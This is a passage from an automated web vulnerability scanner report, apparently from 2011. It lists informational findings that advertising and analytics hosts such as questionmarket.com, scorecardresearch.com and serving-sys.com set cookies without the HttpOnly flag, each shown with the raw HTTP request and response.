The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912025/decide.php?ord=1305199695 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-c; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_912025-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.74. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912026/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912026/decide.php?ord=1305199664 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/venture-capital/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-0; LP=1305126639; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:46 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:27:45 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1_912026-2-1; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-D; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.75. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d909615/2/912027/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d909615/2/912027/decide.php?ord=1305199643 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1; CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2; LP=1305126639

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:25 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a229.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:27:24 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615-(E6)M-0; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.76. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3005403&rn=909564512&c7=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&c4=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&c5=business%20day&c8=Private%20Equity%20Has%20a%20Horse%20in%20the%20Race%20-%20NYTim&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 11:04:16 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 11:04:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.77. http://bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1758908&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=4Z4hoC0UMdOLFTOoUFdt8MycOkKr26b778UQ7Rv4sDujYgzPjPTdfw&W=1; _RwBf=credit=-1; _FP=BDCE=129497049165851875&BDCEH=D52195A634D5E967FDE7349182741915

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1305197971; domain=bing.com; path=/
Date: Thu, 12 May 2011 10:59:31 GMT


14.78. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2391347&PluID=0&w=728&h=90&ord=2011.05.12.11.02.51&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iLxqaLMH07l000001jlP8aJjE0dpH00001iVAyaL8w0clo00001jpdKaLsn073a00002iRpfaL7W0c9M00001jz2OaLMO0cEf00001juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001iLaRaL9K0bnA00001jBofaIOs07Si00001jAsGaJH602WG00003jelLaL7W07pd00002iRoBaLsa0c9M00001isyIaL8z02WG00001; B3=9qGw0000000002uz9wtb0000000001ur8Whx0000000003uu82s80000000002uy9oDg0000000001ut97QM0000000001uA9vHV0000000001uA9X5k0000000001uA910k0000000001uz98nW0000000001uy910n0000000001uy9c210000000002uy96EU0000000001uy8SAT0000000001uy9yEe0000000001uA9yEg0000000001uA7dOu0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001iLznaM7707l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:15 GMT
Connection: close
Content-Length: 1885

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

14.79. http://cf.addthis.com/red/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4dcbc94ff9bf6231&callback=_ate.ad.hrr&pub=y2kesq&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1ca2uh6 HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 12 May 2011 11:49:36 GMT
Set-Cookie: di=1304431085.1FE|1304431085.1OD|1304431085.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11-Jun-2011 11:49:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Thu, 12 May 2011 11:49:35 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

14.80. http://core.insightexpressai.com/adServer/adServerESI.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=175237&siteID=15917119013267459&creativeID=7164347 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAIBanners2708=178563; IXAIBannerCounter178563=1; IXAIFirstHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAILastHit2708=5%2f9%2f2011+10%3a48%3a33+AM; IXAICampaignCounter2708=1; IXAIBanners2579=178140,178140,178140,178140,178140; IXAIBannerCounter178140=5; IXAILastHit2579=5%2f11%2f2011+10%3a28%3a40+AM; IXAICampaignCounter2579=5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 10
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2554=175183,175237; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter175237=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIFirstHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2554=1; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 12 May 2011 11:39:23 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:39:23 GMT
Connection: close
Cache-Control: no-store



14.81. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.pomerantzlaw.com%2fattorneys.html HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0qo9c0053n010k02504; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r034smk6127p10024nnav218e2022062032107238ca131p10d2; acs=014020a0g0h1lkaebsxzt1qo9cxzt1qo9cxzt1p28s; rdrlst=4031194lkmm960cube0033n0110rdll12l4000000013n010znmlkmhha000000043n01; sglst=20e0s9ullkzgkk000000023n010k02502arrll12l4000000013n010k01501ag2lkmm960egby0033n010k025039rylkmhha0cz3a0023f000j00500a6slkzgkk000000023n010k02502bnzlkmhha0el3u0043n010k02504cgzlkmhha0cz3a0043n010k025040tilkmhha0el3u0043n010k025040klll12l4000000013n010k01501a6rlkmhha0cz3a0023f000j00500dlell12l4000000013n010k01501abflkmhha0cz3a0023f000j00500dg4lkmhha0cz3a0043n010k02504943lkzgkk01m0k0023n010k02502

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=014020a0g0h1lkaebsxzt1sl6yxzt1sl6yxzt1p28s; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6y0063o010k03505; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2ziq000000013o01; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: sglst=20k0s9ullkzgkk03iy60023n000k00500arrll12l401wxm0013n000k00500c25ll2ziq000000013o010k0150156bll2ziq000000013o010k01501ag2lkmm960gd9k0043o010k035049rylkmhha0cz3a0023f000j00500a6slkzgkk03iy60023n000k00500bnzlkmhha0gi1g0043n000k00500cgzlkmhha0gi1g0043n000k005000tilkmhha0gi1g0053o010k03505ahhll2ziq000000013o010k015010klll12l401wxm0023o010k02502a6rlkmhha0cz3a0023f000j00500dlell12l401wxm0023o010k02502abflkmhha0cz3a0023f000j00500bo0ll2ziq000000013o010k01501alhll2ziq000000013o010k01501dg4lkmhha0gi1g0043n000k00500942ll2ziq000000013o010k01501943lkzgkk03iy60023n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Set-Cookie: vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
Location: http://cm.g.doubleclick.net/pixel?nid=media6degrees
Content-Length: 0
Date: Thu, 12 May 2011 11:49:38 GMT


14.82. http://da.newstogram.com/hg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:35 GMT; domain=.newstogram.com
Content-Length: 122

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

14.83. http://domdex.com/f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /f?c=107&k=find%20lawyers%20in%20your%20area HTTP/1.1
Host: domdex.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dex=1; k=abc+go-14-1304511016.dating%2Cdating+site%2Conline+dating%2Csingle%2Cfree+dating%2Cdating+services%2Cdatehookup+online+dating%2Clove%2Cromance%2Cdating+service%2Csingle+woman%2Cdating+tip%2Csingle+cruise%2Cspeed+dating%2Csingle+chat%2Cteen+dating-42-1304076634.enterprises%2Creal+estate%2Capartment+for+rent%2Ccheap+airfare%2Cvacation+packages%2Cvegas+vacation%2Ccancun+hotel%2Cnew+cars%2Chybrid+cars%2Cdigital+cameras%2Ccell+phones%2Cringtones%2Cinternet+service%2Claptops%2Csoftware%2Ce+mail-42-1304076188.free+music-107-1303534187.free+music-107-1303534176.high+speed+internet+service-107-1303432104.free+live+porn-14-1303432099.fleet+management-107-1303432080_; r=2521.2863.3148.3586.5452.5454.423.426.433.434.436.441.450.453.457.507.508.1683.1686.1690.1691.1849.2145.421.4605.1575.1956.2161.2162.2163.2405.2691.2921.2888.3127.3949.3952.3953.4913.4915.4949.4952.4953.5042.5294.5362.5449.5520.5530.297.304.428.440.442.443.455.459.460.463.464.511.116.429.1695.1804.257.419.2968.3937.432.4606.510.5211.5324.1850.302.4844.4853.2890.5231.444.449.1185.1212.1422.1573.418.5220.4914.4927.2650.4877_

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, no-cache
Set-Cookie: k=find+lawyers+in+your+area-107-1305201713.abc+go-14-1304511016.dating%2Cdating+site%2Conline+dating%2Csingle%2Cfree+dating%2Cdating+services%2Cdatehookup+online+dating%2Clove%2Cromance%2Cdating+service%2Csingle+woman%2Cdating+tip%2Csingle+cruise%2Cspeed+dating%2Csingle+chat%2Cteen+dating-42-1304076634.enterprises%2Creal+estate%2Capartment+for+rent%2Ccheap+airfare%2Cvacation+packages%2Cvegas+vacation%2Ccancun+hotel%2Cnew+cars%2Chybrid+cars%2Cdigital+cameras%2Ccell+phones%2Cringtones%2Cinternet+service%2Claptops%2Csoftware%2Ce+mail-42-1304076188.free+music-107-1303534187.free+music-107-1303534176.high+speed+internet+service-107-1303432104.free+live+porn-14-1303432099.fleet+management-107-1303432080_; expires=Wed, 10-Aug-2011 12:01:53 GMT
Set-Cookie: r=2521.2863.3148.3586.5452.5454.423.426.433.434.436.441.450.453.457.507.508.1683.1686.1690.1691.1849.2145.421.4605.1575.1956.2161.2162.2163.2405.2691.2921.2888.3127.3949.3952.3953.4913.4915.4949.4952.4953.5042.5294.5362.5449.5520.5530.297.304.428.440.442.443.455.459.460.463.464.511.116.429.1695.1804.257.419.2968.3937.432.4606.510.5211.5324.1850.302.4844.4853.2890.5231.444.449.1185.1212.1422.1573.418.5220.4914.4927.2650.4877_; expires=Wed, 10-Aug-2011 12:01:53 GMT
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


14.84. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json

Summary

Severity:   Information
